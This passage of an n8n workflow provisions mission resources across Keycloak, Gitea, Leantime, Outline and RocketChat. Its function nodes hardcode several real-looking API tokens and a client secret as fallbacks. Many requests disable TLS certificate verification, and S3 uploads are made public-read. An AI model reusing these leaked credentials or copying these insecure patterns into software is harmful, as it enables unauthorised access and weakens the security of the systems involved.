"parameters": [ - { - "name": "grant_type", - "value": "client_credentials" - }, - { - "name": "client_id", - "value": "={{ $node['Process Mission Data'].json.config.KEYCLOAK_CLIENT_ID }}" - }, - { - "name": "client_secret", - "value": "LwgeE1ntADD20OuWC88S3pR0EaO7FtO4" - } - ] - }, - "options": { - "allowUnauthorizedCerts": true, - "response": { - "response": { - "fullResponse": true - } - }, - "timeout": 30000 - } - }, - "name": "Get Keycloak Token", - "type": "n8n-nodes-base.httpRequest", - "typeVersion": 3, - "position": [ - -80, - 520 - ], - "id": "8dd4857b-f536-4acb-ab4e-b15e7f16d2ad", - "continueOnFail": true - }, - { - "parameters": { - "functionCode": "const input = $input.item.json;\n\n// Log full input for debugging\nconsole.log('Keycloak response received:', JSON.stringify(input));\n\n// Handle potential errors from Keycloak\nif (input.error || (input.statusCode >= 400 && input.statusCode <= 599)) {\n console.error('Keycloak error detected. Status:', input.statusCode);\n console.error('Error details:', JSON.stringify(input.error || input.body || input));\n \n // If there's a specific error message in the response body, extract it\n let errorMessage = 'Unknown error from Keycloak';\n let errorDetails = '';\n \n try {\n if (input.error?.message) {\n // Try to parse the error message if it's JSON\n if (input.error.message.includes('{\"error\"')) {\n const errorJson = JSON.parse(input.error.message.substring(input.error.message.indexOf('{')));\n errorMessage = errorJson.error || errorMessage;\n errorDetails = errorJson.error_description || '';\n } else {\n errorMessage = input.error.message;\n }\n } else if (typeof input.body === 'object' && input.body.error) {\n errorMessage = input.body.error;\n errorDetails = input.body.error_description || '';\n }\n } catch (e) {\n console.error('Error parsing Keycloak error:', e);\n }\n \n // Return a default object to allow workflow to continue\n return { json: { \n ...input, // Preserve all original data\n access_token: 'ERROR_FETCHING_TOKEN',\n error: errorMessage,\n errorDetails: errorDetails,\n original_error: input.error || input.body || input\n }};\n}\n\n// Extract token from successful response\nconst access_token = input.body?.access_token;\nif (!access_token) {\n console.error('No access token received from Keycloak');\n console.error('Response body:', JSON.stringify(input.body || input));\n \n // Continue with a placeholder token instead of throwing an error\n return { json: { \n ...input, // Preserve all original data\n access_token: 'NO_TOKEN_RECEIVED',\n error: 'Token missing in Keycloak response',\n errorDetails: JSON.stringify(input.body || input)\n }};\n}\n\nconsole.log('Keycloak token received successfully');\n\n// Create new object to ensure ALL input data is preserved and passed through\nconst result = {};\n\n// First, copy ALL properties from the input\nfor (const key in input) {\n if (input.hasOwnProperty(key)) {\n result[key] = input[key];\n }\n}\n\n// Then add/override the access token and ensure critical properties exist\nresult.access_token = access_token;\n\n// Double-check that critical mission data is preserved\nresult.missionProcessed = input.missionProcessed || {};\nresult.missionOriginal = input.missionOriginal || {};\nresult.config = input.config || {};\nresult.logoUrl = input.logoUrl || '';\nresult.publicUrl = input.publicUrl || '';\nresult.attachmentUrls = input.attachmentUrls || [];\n\n// Ensure missionProcessed has all required fields\nif (!result.missionProcessed.sanitizedName) {\n result.missionProcessed.sanitizedName = result.missionProcessed.name ? \n result.missionProcessed.name.toLowerCase().replace(/[^a-z0-9]+/g, '-') : \n `mission-${Date.now()}`;\n}\n\nif (!result.missionProcessed.description) {\n result.missionProcessed.description = 'Mission documentation';\n}\n\nif (!Array.isArray(result.missionProcessed.rocketChatUsernames)) {\n result.missionProcessed.rocketChatUsernames = [];\n}\n\n// Ensure config has all required fields\nif (!result.config.ROCKETCHAT_API_URL) {\n result.config.ROCKETCHAT_API_URL = 'https://parole.slm-lab.net/';\n}\n\nif (!result.config.ROCKETCHAT_AUTH_TOKEN) {\n result.config.ROCKETCHAT_AUTH_TOKEN = 'w91TYgkH-Z67Oz72usYdkW5TZLLRwnre7qyAhp7aHJB';\n}\n\nif (!result.config.ROCKETCHAT_USER_ID) {\n result.config.ROCKETCHAT_USER_ID = 'Tpuww59PJKsrGNQJB';\n}\n\nif (!result.config.OUTLINE_API_URL) {\n result.config.OUTLINE_API_URL = 'https://chapitre.slm-lab.net/api';\n}\n\nif (!result.config.OUTLINE_API_TOKEN) {\n result.config.OUTLINE_API_TOKEN = 'ol_api_tlLlANBfcoJ4l7zA8GOcpduAeL6QyBTcYvEnlN';\n}\n\n// Log the final result for debugging\nconsole.log('Process Token - Final Result:', {\n hasMissionProcessed: !!result.missionProcessed,\n hasConfig: !!result.config,\n sanitizedName: result.missionProcessed.sanitizedName,\n description: result.missionProcessed.description,\n rocketChatUsernames: result.missionProcessed.rocketChatUsernames,\n hasRocketChatConfig: !!(result.config.ROCKETCHAT_API_URL && result.config.ROCKETCHAT_AUTH_TOKEN && result.config.ROCKETCHAT_USER_ID),\n hasOutlineConfig: !!(result.config.OUTLINE_API_URL && result.config.OUTLINE_API_TOKEN)\n});\n\n// Return the enhanced object\nreturn { json: result };" - }, - "name": "Process Token", - "type": "n8n-nodes-base.function", - "typeVersion": 1, - "position": [ - 160, - 680 - ], - "id": "7bdee26f-dccb-42eb-8204-f5260577bf7b", - "continueOnFail": true - }, - { - "parameters": { - "functionCode": "// Debug function to check what data is flowing to RocketChat and Documentation\nconst input = $input.item.json;\n\n// Enhanced logging for service nodes\nconsole.log('DEBUG - Detailed Service Data Flow:', {\n // Mission Data\n 'missionProcessed exists': !!input.missionProcessed,\n 'missionProcessed.sanitizedName': input.missionProcessed?.sanitizedName,\n 'missionProcessed.name': input.missionProcessed?.name,\n \n // RocketChat specific\n 'rocketChatUsernames': input.missionProcessed?.rocketChatUsernames,\n 'rocketChatUsernames length': input.missionProcessed?.rocketChatUsernames?.length,\n 'rocketChatUsernames type': typeof input.missionProcessed?.rocketChatUsernames,\n 'ROCKETCHAT_API_URL': input.config?.ROCKETCHAT_API_URL,\n 'ROCKETCHAT_AUTH_TOKEN exists': !!input.config?.ROCKETCHAT_AUTH_TOKEN,\n 'ROCKETCHAT_USER_ID exists': !!input.config?.ROCKETCHAT_USER_ID,\n \n // Documentation specific\n 'OUTLINE_API_URL': input.config?.OUTLINE_API_URL,\n 'OUTLINE_API_TOKEN exists': !!input.config?.OUTLINE_API_TOKEN,\n 'mission description': input.missionProcessed?.description,\n \n // Common data\n 'logoUrl': input.logoUrl,\n 'config exists': !!input.config,\n 'keycloak token': input.access_token?.substring(0, 10) + '...',\n 'LEANTIME_API_URL': input.config?.LEANTIME_API_URL\n});\n\n// Create a copy of the input data to ensure we don't modify the original\nconst output = { ...input };\n\n// Ensure missionProcessed exists and has required fields\noutput.missionProcessed = output.missionProcessed || {};\n\n// Ensure sanitizedName exists\nif (!output.missionProcessed.sanitizedName) {\n output.missionProcessed.sanitizedName = output.missionProcessed.name ? \n output.missionProcessed.name.toLowerCase().replace(/[^a-z0-9]+/g, '-') : \n `mission-${Date.now()}`;\n}\n\n// Ensure description exists\nif (!output.missionProcessed.description) {\n output.missionProcessed.description = 'Mission documentation';\n}\n\n// Ensure rocketChatUsernames is an array\nif (!Array.isArray(output.missionProcessed.rocketChatUsernames)) {\n output.missionProcessed.rocketChatUsernames = [];\n}\n\n// Ensure config exists and has required fields\noutput.config = output.config || {};\n\n// Ensure RocketChat config exists\nif (!output.config.ROCKETCHAT_API_URL) {\n output.config.ROCKETCHAT_API_URL = 'https://parole.slm-lab.net/';\n}\nif (!output.config.ROCKETCHAT_AUTH_TOKEN) {\n output.config.ROCKETCHAT_AUTH_TOKEN = 'w91TYgkH-Z67Oz72usYdkW5TZLLRwnre7qyAhp7aHJB';\n}\nif (!output.config.ROCKETCHAT_USER_ID) {\n output.config.ROCKETCHAT_USER_ID = 'Tpuww59PJKsrGNQJB';\n}\n\n// Ensure Documentation config exists\nif (!output.config.OUTLINE_API_URL) {\n output.config.OUTLINE_API_URL = 'https://chapitre.slm-lab.net/api';\n}\nif (!output.config.OUTLINE_API_TOKEN) {\n output.config.OUTLINE_API_TOKEN = 'ol_api_tlLlANBfcoJ4l7zA8GOcpduAeL6QyBTcYvEnlN';\n}\n\n// Log the final output for debugging\nconsole.log('Debug Service Data - Final Output:', {\n hasMissionProcessed: !!output.missionProcessed,\n hasConfig: !!output.config,\n sanitizedName: output.missionProcessed.sanitizedName,\n description: output.missionProcessed.description,\n rocketChatUsernames: output.missionProcessed.rocketChatUsernames,\n hasRocketChatConfig: !!(output.config.ROCKETCHAT_API_URL && output.config.ROCKETCHAT_AUTH_TOKEN && output.config.ROCKETCHAT_USER_ID),\n hasOutlineConfig: !!(output.config.OUTLINE_API_URL && output.config.OUTLINE_API_TOKEN)\n});\n\n// Return the enhanced object\nreturn { json: output };" - }, - "name": "Debug Service Data", - "type": "n8n-nodes-base.function", - "typeVersion": 1, - "position": [ - 160, - 880 - ], - "id": "2e46ba3f-1466-4eb2-9868-126552f389bc" - }, - { - "parameters": { - "conditions": { - "boolean": [ - { - "value1": "={{ $json.missionProcessed.services.includes('Gite') || $json.missionProcessed.services.includes('Calcul') }}", - "value2": true - } - ] - } - }, - "name": "IF Needs Git Repository", - "type": "n8n-nodes-base.if", - "typeVersion": 1, - "position": [ - 140, - 500 - ], - "id": "014e0ad5-dc21-4e21-be9f-fcc085aa0ca8" - }, - { - "parameters": { - "method": "POST", - "url": "={{ $node['Process Mission Data'].json.config.GITEA_API_URL + '/user/repos' }}", - "sendHeaders": true, - "headerParameters": { - "parameters": [ - { - "name": "Content-Type", - "value": "application/json" - }, - { - "name": "Authorization", - "value": "={{ 'token ' + $node['Process Mission Data'].json.config.GITEA_API_TOKEN }}" - } - ] - }, - "sendBody": true, - "bodyParameters": { - "parameters": [ - { - "name": "name", - "value": "={{ $node['Process Mission Data'].json.missionProcessed.sanitizedName }}" - }, - { - "name": "private", - "value": "={{ true }}" - }, - { - "name": "auto_init", - "value": "={{ true }}" - }, - { - "name": "avatar_url", - "value": "={{ $node['Process Upload Results'].json.logoUrl }}" - } - ] - }, - "options": { - "allowUnauthorizedCerts": true, - "response": { - "response": { - "fullResponse": true - } - }, - "timeout": 30000 - } - }, - "name": "Create Git Repository", - "type": "n8n-nodes-base.httpRequest", - "typeVersion": 3, - "position": [ - 460, - 460 - ], - "id": "016939d6-a0d9-4f44-9c02-1a289cd39243", - "errorMessage": "={{ $json.error?.message || 'Unknown error creating Git repository' }}", - "continueOnFail": true - }, - { - "parameters": { - "method": "POST", - "url": "={{ $node['Process Mission Data'].json.config.LEANTIME_API_URL + '/api/jsonrpc' }}", - "sendHeaders": true, - "headerParameters": { - "parameters": [ - { - "name": "Content-Type", - "value": "application/json" - }, - { - "name": "X-API-Key", - "value": "={{ $node['Process Mission Data'].json.config.LEANTIME_API_TOKEN }}" - } - ] - }, - "sendBody": true, - "bodyParameters": { - "parameters": [ - { - "name": "method", - "value": "leantime.rpc.Projects.Projects.addProject" - }, - { - "name": "jsonrpc", - "value": "2.0" - }, - { - "name": "id", - "value": "1" - }, - { - "name": "params", - "value": "={{ { values: { name: $node['Process Mission Data'].json.missionProcessed.name, clientId: $node['Process Mission Data'].json.missionProcessed.clientId, details: $node['Process Mission Data'].json.missionProcessed.intention, type: 'project', start: $node['Process Mission Data'].json.missionProcessed.startDate, end: $node['Process Mission Data'].json.missionProcessed.endDate, status: 'open', psettings: 'restricted', avatar: $node['Process Upload Results'].json.logoUrl } } }}" - } - ] - }, - "options": { - "allowUnauthorizedCerts": true, - "response": { - "response": { - "fullResponse": true - } - }, - "timeout": 30000 - } - }, - "name": "Create Leantime Project", - "type": "n8n-nodes-base.httpRequest", - "typeVersion": 3, - "position": [ - 460, - 620 - ], - "id": "49e76ac2-2dbf-497a-bdce-2eefd09acabb", - "continueOnFail": true - }, - { - "parameters": { - "method": "POST", - "url": "={{ $node['Process Mission Data'].json.config.OUTLINE_API_URL + '/collections.create' }}", - "sendHeaders": true, - "headerParameters": { - "parameters": [ - { - "name": "Content-Type", - "value": "application/json" - }, - { - "name": "Authorization", - "value": "={{ 'Bearer ' + $node['Process Mission Data'].json.config.OUTLINE_API_TOKEN }}" - } - ] - }, - "sendBody": true, - "bodyParameters": { - "parameters": [ - { - "name": "name", - "value": "={{ $node['Process Mission Data'].json.missionProcessed.sanitizedName }}" - }, - { - "name": "description", - "value": "={{ $node['Process Mission Data'].json.missionProcessed.description || 'Mission documentation' }}" - }, - { - "name": "color", - "value": "#4f46e5" - }, - { - "name": "permission", - "value": "read" - }, - { - "name": "private", - "value": "={{ true }}" - }, - { - "name": "avatarUrl", - "value": "={{ $node['Process Upload Results'].json.logoUrl }}" - } - ] - }, - "options": { - "allowUnauthorizedCerts": true, - "response": { - "response": { - "fullResponse": true - } - }, - "timeout": 30000 - } - }, - "name": "Create Documentation Collection", - "type": "n8n-nodes-base.httpRequest", - "typeVersion": 3, - "position": [ - 480, - 940 - ], - "id": "edbefc50-bdf2-4807-996d-f06c3e5d526a", - "continueOnFail": true - }, - { - "parameters": { - "method": "POST", - "url": "={{ $node['Process Mission Data'].json.config.ROCKETCHAT_API_URL + '/api/v1/channels.create' }}", - "sendHeaders": true, - "headerParameters": { - "parameters": [ - { - "name": "Content-Type", - "value": "application/json" - }, - { - "name": "X-Auth-Token", - "value": "={{ $node['Process Mission Data'].json.config.ROCKETCHAT_AUTH_TOKEN }}" - }, - { - "name": "X-User-Id", - "value": "={{ $node['Process Mission Data'].json.config.ROCKETCHAT_USER_ID }}" - } - ] - }, - "sendBody": true, - "bodyParameters": { - "parameters": [ - { - "name": "name", - "value": "={{ $node['Process Mission Data'].json.missionProcessed.sanitizedName }}" - }, - { - "name": "members", - "value": "={{ Array.isArray($node['Process Mission Data'].json.missionProcessed.rocketChatUsernames) ? $node['Process Mission Data'].json.missionProcessed.rocketChatUsernames : [] }}" - }, - { - "name": "readOnly", - "value": "false" - }, - { - "name": "avatarUrl", - "value": "={{ $node['Process Upload Results'].json.logoUrl }}" - } - ] - }, - "options": { - "allowUnauthorizedCerts": true, - "response": { - "response": { - "fullResponse": true - } - }, - "timeout": 30000 - } - }, - "name": "Create RocketChat Channel", - "type": "n8n-nodes-base.httpRequest", - "typeVersion": 3, - "position": [ - 460, - 760 - ], - "id": "fd2abbe2-ff12-4ab0-9308-115eb2a1da14", - "continueOnFail": true - }, - { - "parameters": { - "functionCode": "// Combine results from all integrations with better error handling\ntry {\n // Defensively get results from each service node\n let gitRepoResult = {};\n let leantimeResult = {};\n let docCollectionResult = {};\n let rocketChatResult = {};\n let uploadResults = {};\n let keycloakToken = {};\n \n try { \n gitRepoResult = $node['Create Git Repository']?.json || {};\n console.log('Git repo node executed successfully'); \n } catch (e) { \n console.log('Git repo node not executed yet, continuing anyway'); \n }\n \n try { \n leantimeResult = $node['Create Leantime Project']?.json || {};\n console.log('Leantime node executed successfully');\n } catch (e) { \n console.log('Leantime node not executed yet, continuing anyway'); \n }\n \n try { \n docCollectionResult = $node['Create Documentation Collection']?.json || {};\n console.log('Documentation node executed successfully');\n } catch (e) { \n console.log('Documentation node not executed yet, continuing anyway'); \n }\n \n try { \n rocketChatResult = $node['Create RocketChat Channel']?.json || {};\n console.log('RocketChat node executed successfully');\n } catch (e) { \n console.log('RocketChat node not executed yet, continuing anyway'); \n }\n \n try { \n uploadResults = $node['Process Upload Results']?.json || {};\n console.log('Upload Results available');\n } catch (e) { \n console.log('Upload Results not available, continuing anyway'); \n }\n \n try { \n keycloakToken = $node['Process Token']?.json || {};\n console.log('Keycloak token available');\n } catch (e) { \n console.log('Keycloak token not available, continuing anyway'); \n }\n \n // Track which resources were actually created vs already existed\n const resourceStatus = {\n gitRepo: false,\n leantimeProject: false,\n docCollection: false,\n rocketChatChannel: false\n };\n \n // Process Git repository result\n if (gitRepoResult.error?.includes('already exists')) {\n console.log('Git repository already exists');\n gitRepoResult = { exists: true };\n } else if (gitRepoResult.body?.body?.html_url) {\n resourceStatus.gitRepo = true;\n console.log('Git repository created successfully with URL:', gitRepoResult.body.body.html_url);\n }\n \n // Process Leantime project result - Updated to check for array result\n if (leantimeResult.error?.includes('already exists')) {\n console.log('Leantime project already exists');\n leantimeResult = { exists: true };\n } else if (leantimeResult.body?.result && Array.isArray(leantimeResult.body.result) && leantimeResult.body.result.length > 0) {\n resourceStatus.leantimeProject = true;\n console.log('Leantime project created successfully with ID:', leantimeResult.body.result[0]);\n }\n \n // Process Documentation collection result - Updated to check for data wrapper\n if (docCollectionResult.error?.includes('already exists')) {\n console.log('Documentation collection already exists');\n docCollectionResult = { exists: true };\n } else if (docCollectionResult.body?.data?.id) {\n resourceStatus.docCollection = true;\n console.log('Documentation collection created successfully with ID:', docCollectionResult.body.data.id);\n }\n \n // Process RocketChat channel result\n if (rocketChatResult.error?.includes('error-duplicate-channel-name')) {\n console.log('RocketChat channel already exists');\n rocketChatResult = { exists: true };\n } else if (rocketChatResult.body?.channel?._id) {\n resourceStatus.rocketChatChannel = true;\n }\n \n // Gather information about what executed\n const executedNodes = [];\n if (Object.keys(gitRepoResult).length > 0) executedNodes.push('Git');\n if (Object.keys(leantimeResult).length > 0) executedNodes.push('Leantime');\n if (Object.keys(docCollectionResult).length > 0) executedNodes.push('Documentation');\n if (Object.keys(rocketChatResult).length > 0) executedNodes.push('RocketChat');\n \n console.log(`Executed nodes (${executedNodes.length}): ${executedNodes.join(', ')}`);\n \n // Handle empty results with empty objects to prevent errors\n const results = {\n gitRepo: gitRepoResult.error ? { error: gitRepoResult.error.message || 'Git repository creation failed' } : (gitRepoResult.body?.body || gitRepoResult.body || gitRepoResult || {}),\n leantimeProject: leantimeResult.error ? { error: leantimeResult.error.message || 'Leantime project creation failed' } : (leantimeResult.body || leantimeResult || {}),\n docCollection: docCollectionResult.error ? { error: docCollectionResult.error.message || 'Documentation collection creation failed' } : (docCollectionResult.body || docCollectionResult || {}),\n rocketChatChannel: rocketChatResult.error ? { error: rocketChatResult.error.message || 'RocketChat channel creation failed' } : (rocketChatResult.body || rocketChatResult || {}),\n uploadResults: uploadResults || {},\n keycloakToken: keycloakToken || {},\n executedNodes: executedNodes,\n resourceStatus: resourceStatus\n };\n \n // Log key details for debugging\n console.log('Git repo HTML URL:', results.gitRepo?.html_url || 'not available');\n console.log('Leantime project ID:', results.leantimeProject?.result?.[0] || 'not available');\n console.log('Documentation ID:', results.docCollection?.data?.id || 'not available');\n console.log('RocketChat channel ID:', results.rocketChatChannel?.channel?._id || 'not available');\n \n return results;\n} catch (error) {\n console.error('Error in Combine Results:', error);\n // Return minimal object to allow workflow to continue\n return {\n error: `Error combining results: ${error.message}`,\n gitRepo: {},\n leantimeProject: {},\n docCollection: {},\n rocketChatChannel: {}\n };\n}" - }, - "name": "Combine Results", - "type": "n8n-nodes-base.function", - "typeVersion": 1, - "position": [ - 660, - 600 - ], - "id": "d4be7e93-0a23-4c7b-b936-91fe88e531ae", - "continueOnFail": true - }, - { - "parameters": { - "method": "POST", - "url": "={{ $node['Process Mission Data'].json.config.MISSION_API_URL + '/mission-created' }}", - "sendHeaders": true, - "headerParameters": { - "parameters": [ - { - "name": "Content-Type", - "value": "application/json" - }, - { - "name": "x-api-key", - "value": "={{ $node['Process Mission Data'].json.config.N8N_API_KEY }}" - } - ] - }, - "sendBody": true, - "bodyParameters": { - "parameters": [ - { - "name": "name", - "value": "={{ $node['Process Mission Data'].json.missionProcessed.name }}" - }, - { - "name": "niveau", - "value": "={{ $node['Process Mission Data'].json.missionProcessed.niveau || 'default' }}" - }, - { - "name": "intention", - "value": "={{ $node['Process Mission Data'].json.missionProcessed.intention }}" - }, - { - "name": "description", - "value": "={{ $node['Process Mission Data'].json.missionProcessed.description }}" - }, - { - "name": "logo", - "value": "={{ $node['Process Upload Results'].json.logoUrl }}" - }, - { - "name": "attachments", - "value": "={{ $node['Process Upload Results'].json.attachmentUrls }}" - }, - { - "name": "gitRepoUrl", - "value": "={{ $node['Combine Results'].json.gitRepo?.html_url || '' }}" - }, - { - "name": "leantimeProjectId", - "value": "={{ $node['Combine Results'].json.leantimeProject?.result?.[0] || '' }}" - }, - { - "name": "documentationCollectionId", - "value": "={{ $node['Combine Results'].json.docCollection?.data?.id || '' }}" - }, - { - "name": "rocketchatChannelId", - "value": "={{ $node['Combine Results'].json.rocketChatChannel?.channel?._id || '' }}" - }, - { - "name": "donneurDOrdre", - "value": "={{ $node['Process Mission Data'].json.missionProcessed.donneurDOrdre || 'default' }}" - }, - { - "name": "projection", - "value": "={{ $node['Process Mission Data'].json.missionProcessed.projection || 'default' }}" - }, - { - "name": "missionType", - "value": "={{ $node['Process Mission Data'].json.missionProcessed.missionType || 'default' }}" - }, - { - "name": "creatorId", - "value": "={{ $node['Process Mission Data'].json.creatorId }}" - } - ] - }, - "options": { - "response": { - "response": { - "fullResponse": true - } - }, - "timeout": 30000 - } - }, - "name": "Save Mission To API", - "type": "n8n-nodes-base.httpRequest", - "typeVersion": 3, - "position": [ - 820, - 600 - ], - "id": "dedd43e5-6b46-4dba-8eeb-008648549344" - }, - { - "parameters": { - "jsCode": "// Defensive access to all nodes\nconst missionData = $node['Process Mission Data']?.json?.missionProcessed || {};\nconst integrationResults = $node['Combine Results']?.json || {};\nconst saveMissionResult = $node['Save Mission To API']?.json || {};\nconst errors = [];\nconst warnings = [];\n\n// Check for actual errors vs expected failures\nif (saveMissionResult.error) {\n errors.push(`Failed to save mission: ${saveMissionResult.error.message || 'Unknown error'}`);\n}\n\n// Track which resources were actually created vs already existed\nconst resourceStatus = {\n gitRepo: false,\n leantimeProject: false,\n docCollection: false,\n rocketChatChannel: false\n};\n\n// Check if Git repository is needed\nconst needsGitRepo = Array.isArray(missionData.services) && \n (missionData.services.includes('Gite') || missionData.services.includes('Calcul'));\n\n// Process Git repository result only if needed\nif (needsGitRepo) {\n if (integrationResults.gitRepo?.html_url) {\n resourceStatus.gitRepo = true;\n console.log('Git repository created successfully');\n } else if (integrationResults.gitRepo?.error?.includes('already exists')) {\n console.log('Git repository already exists, this is expected');\n warnings.push('Git repository already exists');\n } else if (integrationResults.gitRepo?.error) {\n errors.push(`Git repository creation failed: ${integrationResults.gitRepo.error}`);\n } else {\n errors.push('Git repository creation failed: Unknown error');\n }\n} else {\n console.log('Git repository not needed for this mission');\n resourceStatus.gitRepo = true; // Mark as successful since it's not needed\n}\n\n// Process Leantime project result\nif (integrationResults.leantimeProject?.error?.includes('already exists')) {\n console.log('Leantime project already exists');\n integrationResults.leantimeProject = { exists: true };\n} else if (integrationResults.leantimeProject?.result?.[0]) {\n resourceStatus.leantimeProject = true;\n console.log('Leantime project created successfully with ID:', integrationResults.leantimeProject.result[0]);\n} else if (integrationResults.leantimeProject?.error) {\n errors.push(`Leantime project creation failed: ${integrationResults.leantimeProject.error}`);\n}\n\n// Process Documentation collection result\nif (integrationResults.docCollection?.error?.includes('already exists')) {\n console.log('Documentation collection already exists');\n integrationResults.docCollection = { exists: true };\n} else if (integrationResults.docCollection?.data?.id) {\n resourceStatus.docCollection = true;\n console.log('Documentation collection created successfully with ID:', integrationResults.docCollection.data.id);\n} else if (integrationResults.docCollection?.error) {\n errors.push(`Documentation collection creation failed: ${integrationResults.docCollection.error}`);\n}\n\n// Process RocketChat channel result\nif (integrationResults.rocketChatChannel?.error?.includes('error-duplicate-channel-name')) {\n console.log('RocketChat channel already exists');\n integrationResults.rocketChatChannel = { exists: true };\n} else if (integrationResults.rocketChatChannel?.channel?._id) {\n resourceStatus.rocketChatChannel = true;\n console.log('RocketChat channel created successfully');\n} else if (integrationResults.rocketChatChannel?.error) {\n errors.push(`RocketChat channel creation failed: ${integrationResults.rocketChatChannel.error}`);\n}\n\n// Check if any critical resources failed to create\nconst criticalFailures = errors.filter(error => \n !error.includes('already exists') && \n !error.includes('expected')\n);\n\n// If the mission was successfully saved, consider it a success even if some resources already exist\nconst success = saveMissionResult.body?.message === 'Mission updated successfully' || \n saveMissionResult.body?.message === 'Mission created successfully';\n\n// Determine the final status\nconst status = criticalFailures.length > 0 ? 'error' : \n warnings.length > 0 ? 'warning' : \n 'success';\n\nconst output = {\n success: success && criticalFailures.length === 0,\n status,\n error: errors.length > 0 ? errors.join('; ') : null,\n errors,\n warnings,\n missionData,\n integrationResults,\n saveMissionResult,\n resourceStatus,\n message: status === 'success' ? \n 'Mission integration complete: All systems updated successfully' : \n status === 'warning' ? \n `Mission integration complete with warnings: ${warnings.join('; ')}` : \n `Mission integration failed: ${errors.join('; ')}`\n};\n\n// Log the final status\nconsole.log('Process Results - Final Status:', {\n success: output.success,\n status: output.status,\n errors: output.errors.length,\n warnings: output.warnings.length,\n resourceStatus,\n needsGitRepo\n});\n\nreturn output;" - }, - "name": "Process Results", - "type": "n8n-nodes-base.code", - "typeVersion": 2, - "position": [ - 1000, - 600 - ], - "id": "595a8f1b-c5dd-4905-a70d-676e48670495" - }, - { - "parameters": { - "respondWith": "json", - "responseBody": "={{ $node[\"Process Results\"].json }}", - "options": {} - }, - "name": "Respond To Webhook", - "type": "n8n-nodes-base.respondToWebhook", - "typeVersion": 1, - "position": [ - 1220, - 600 - ], - "id": "870509e0-39fc-44e0-81ff-cec9f41e7522" - }, - { - "parameters": { - "operation": "upload", - "bucketName": "=missions", - "fileName": "={{$input.item.json.missionId}}/attachments/{{$input.item.json.fileName}}", - "additionalFields": { - "acl": "public-read" - } - }, - "name": "S3 Upload Attachments", - "type": "n8n-nodes-base.s3", - "typeVersion": 1, - "position": [ - -280, - 680 - ], - "id": "179cd4d0-44db-400a-b7af-044f1aff5557", - "credentials": { - "s3": { - "id": "xvSkHfsTBJxzopIj", - "name": "S3 account 2" - } - }, - "continueOnFail": true - }, - { - "parameters": { - "httpMethod": "POST", - "path": "mission-created", - "responseMode": "lastNode", - "responseData": "allEntries", - "options": {} - }, - "name": "Mission Created Webhook", - "type": "n8n-nodes-base.webhook", - "typeVersion": 1, - "position": [ - -1320, - 600 - ], - "webhookId": "mission-created", - "id": "de1fdb33-3e7c-43bc-86b9-aa3bdc3c36d0" - }, - { - "parameters": { - "conditions": { - "boolean": [ - { - "value1": "={{ $json.skipIntegrations }}" - } - ] - } - }, - "name": "IF Run Integrations", - "type": "n8n-nodes-base.if", - "typeVersion": 1, - "position": [ - 140, - 500 - ], - "id": "adfe1ad8-2657-4145-b97d-852a008f9643" - }, - { - "parameters": { - "functionCode": "// Merge paths after Process Upload Results\nconst input = $input.item.json;\n\n// Log the input for debugging\nconsole.log('Merge Paths - Input:', {\n hasInput: !!input,\n hasAttachments: input?.hasAttachments,\n skipIntegrations: input?.skipIntegrations,\n logoUrl: input?.logoUrl,\n attachmentUrls: input?.attachmentUrls,\n hasMissionProcessed: !!input?.missionProcessed,\n hasConfig: !!input?.config\n});\n\n// Get mission data from Process Mission Data node\nconst missionData = $node['Process Mission Data']?.json || {};\n\n// Ensure we have all necessary data\nconst output = {\n ...input,\n // Ensure these fields exist even if they weren't in the input\n logoUrl: input?.logoUrl || '',\n attachmentUrls: Array.isArray(input?.attachmentUrls) ? input.attachmentUrls : [],\n hasAttachments: !!input?.hasAttachments,\n skipIntegrations: !!input?.skipIntegrations,\n // Add mission data from Process Mission Data node\n missionProcessed: {\n ...missionData.missionProcessed,\n name: missionData.missionProcessed?.name || input?.missionProcessed?.name || 'Unnamed Mission',\n sanitizedName: missionData.missionProcessed?.sanitizedName || input?.missionProcessed?.sanitizedName || 'unnamed-mission',\n intention: missionData.missionProcessed?.intention || input?.missionProcessed?.intention || '',\n description: missionData.missionProcessed?.description || input?.missionProcessed?.description || 'Mission documentation',\n startDate: missionData.missionProcessed?.startDate || input?.missionProcessed?.startDate || new Date().toISOString().split('T')[0],\n endDate: missionData.missionProcessed?.endDate || input?.missionProcessed?.endDate || new Date(Date.now() + 30 * 24 * 60 * 60 * 1000).toISOString().split('T')[0],\n missionType: missionData.missionProcessed?.missionType || input?.missionProcessed?.missionType || 'default',\n guardians: missionData.missionProcessed?.guardians || input?.missionProcessed?.guardians || {},\n volunteers: Array.isArray(missionData.missionProcessed?.volunteers) ? missionData.missionProcessed.volunteers : (Array.isArray(input?.missionProcessed?.volunteers) ? input.missionProcessed.volunteers : []),\n profils: Array.isArray(missionData.missionProcessed?.profils) ? missionData.missionProcessed.profils : (Array.isArray(input?.missionProcessed?.profils) ? input.missionProcessed.profils : []),\n services: Array.isArray(missionData.missionProcessed?.services) ? missionData.missionProcessed.services : (Array.isArray(input?.missionProcessed?.services) ? input.missionProcessed.services : []),\n clientId: missionData.missionProcessed?.clientId || input?.missionProcessed?.clientId || 2,\n rocketChatUsernames: Array.isArray(missionData.missionProcessed?.rocketChatUsernames) ? missionData.missionProcessed.rocketChatUsernames : (Array.isArray(input?.missionProcessed?.rocketChatUsernames) ? input.missionProcessed.rocketChatUsernames : [])\n },\n config: {\n ...missionData.config,\n GITEA_API_URL: missionData.config?.GITEA_API_URL || input?.config?.GITEA_API_URL || 'https://gite.slm-lab.net/api/v1',\n GITEA_API_TOKEN: missionData.config?.GITEA_API_TOKEN || input?.config?.GITEA_API_TOKEN || '310645d564cbf752be1fe3b42582a3d5f5d0bddd',\n GITEA_OWNER: missionData.config?.GITEA_OWNER || input?.config?.GITEA_OWNER || 'alma',\n LEANTIME_API_URL: missionData.config?.LEANTIME_API_URL || input?.config?.LEANTIME_API_URL || 'https://agilite.slm-lab.net',\n LEANTIME_API_TOKEN: missionData.config?.LEANTIME_API_TOKEN || input?.config?.LEANTIME_API_TOKEN || 'lt_lsdShQdoYHaPUWuL07XZR1Rf3GeySsIs_UDlll3VJPk5EwAuILpMC4BwzJ9MZFRrb',\n ROCKETCHAT_API_URL: missionData.config?.ROCKETCHAT_API_URL || input?.config?.ROCKETCHAT_API_URL || 'https://parole.slm-lab.net/',\n ROCKETCHAT_AUTH_TOKEN: missionData.config?.ROCKETCHAT_AUTH_TOKEN || input?.config?.ROCKETCHAT_AUTH_TOKEN || 'w91TYgkH-Z67Oz72usYdkW5TZLLRwnre7qyAhp7aHJB',\n ROCKETCHAT_USER_ID: missionData.config?.ROCKETCHAT_USER_ID || input?.config?.ROCKETCHAT_USER_ID || 